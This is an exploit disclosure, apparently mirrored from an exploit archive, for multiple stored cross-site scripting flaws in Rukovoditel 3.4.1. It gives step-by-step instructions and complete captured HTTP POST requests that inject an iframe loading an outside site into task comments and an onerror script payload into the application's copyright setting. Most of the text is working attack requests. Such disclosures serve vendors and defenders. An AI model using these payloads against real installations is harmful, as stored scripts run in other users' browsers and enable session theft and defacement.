Share
## https://sploitus.com/exploit?id=PACKETSTORM:173281
Exploit Title: Rukovoditel 3.4.1 - Multiple Stored XSS  
Version: 3.4.1  
Bugs: Multiple Stored XSS  
Technology: PHP  
Vendor URL: https://www.rukovoditel.net/  
Software Link: https://www.rukovoditel.net/download.php  
Date of found: 24-06-2023  
Author: Mirabbas Ağalarov  
Tested on: Linux   
  
  
2. Technical Details & POC  
========================================  
###XSS-1###  
========================================  
steps:  
1. login to account  
2. create project (http://localhost/index.php?module=items/items&path=21)  
3. add task   
4. open task   
5. add comment as "<iframe src="https://14.rs"></iframe> "  
  
  
POST /index.php?module=items/comments&action=save&token=FEOZ9jeKuA HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 241  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/index.php?module=items/info&path=21-2/22-1&redirect_to=subentity&gotopage[74]=1  
Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
  
form_session_token=FEOZ9jeKuA&path=21-2%2F22-1&fields%5B169%5D=47&fields%5B170%5D=53&fields%5B174%5D=3&description=%3Ciframe+src%3D%22https%3A%2F%2F14.rs%22%3E%3C%2Fiframe%3E+&uploadifive_attachments_upload_attachments=&comments_attachments=  
  
===========================  
###XSS-2###  
===========================  
1.go to admin account  
2.go to configration => applicaton  
3.Copyright Text set as "<img src=x onerror=alert(1)>"  
  
  
POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------12298384558648010343132232769  
Content-Length: 2766  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/index.php?module=configuration/application  
Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
  
-----------------------------12298384558648010343132232769  
Content-Disposition: form-data; name="form_session_token"  
  
ju271AAoy1  
-----------------------------12298384558648010343132232769  
Content-Disposition: form-data; name="CFG[APP_NAME]"  
  
Rukovoditel  
-----------------------------12298384558648010343132232769  
Content-Disposition: form-data; name="CFG[APP_SHORT_NAME_MOBILE]"  
  
ffgsdfgsdfg  
-----------------------------12298384558648010343132232769  
Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]"  
  
ruko  
-----------------------------12298384558648010343132232769  
Content-Disposition: form-data; name="APP_LOGO"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------12298384558648010343132232769  
Content-Disposition: form-data; name="CFG[APP_LOGO]"  
  
  
-----------------------------12298384558648010343132232769  
Content-Disposition: form-data; name="CFG[APP_LOGO_URL]"  
  
  
-----------------------------12298384558648010343132232769  
Content-Disposition: form-data; name="APP_FAVICON"; filename=""  
Content-Type: application/octet-stream  
  
  
-----------------------------12298384558648010343132232769  
Content-Disposition: form-data; name="CFG[APP_FAVICON]"  
  
  
-----------------------------12298384558648010343132232769  
Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]"  
  
<img src=x onerror=alert(1)>  
-----------------------------12298384558648010343132232769  
Content-Disposition: form-data; name="CFG[APP_LANGUAGE]"  
  
english.php  
-----------------------------12298384558648010343132232769  
Content-Disposition: form-data; name="CFG[APP_SKIN]"  
  
  
-----------------------------12298384558648010343132232769  
Content-Disposition: form-data; name="CFG[APP_TIMEZONE]"  
  
America/New_York  
-----------------------------12298384558648010343132232769  
Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]"  
  
10  
-----------------------------12298384558648010343132232769  
Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]"  
  
m/d/Y  
-----------------------------12298384558648010343132232769  
Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]"  
  
m/d/Y H:i  
-----------------------------12298384558648010343132232769  
Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]"  
  
2/./*  
-----------------------------12298384558648010343132232769  
Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]"  
  
0  
-----------------------------12298384558648010343132232769  
Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]"  
  
0  
-----------------------------12298384558648010343132232769  
Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]"  
  
0  
-----------------------------12298384558648010343132232769--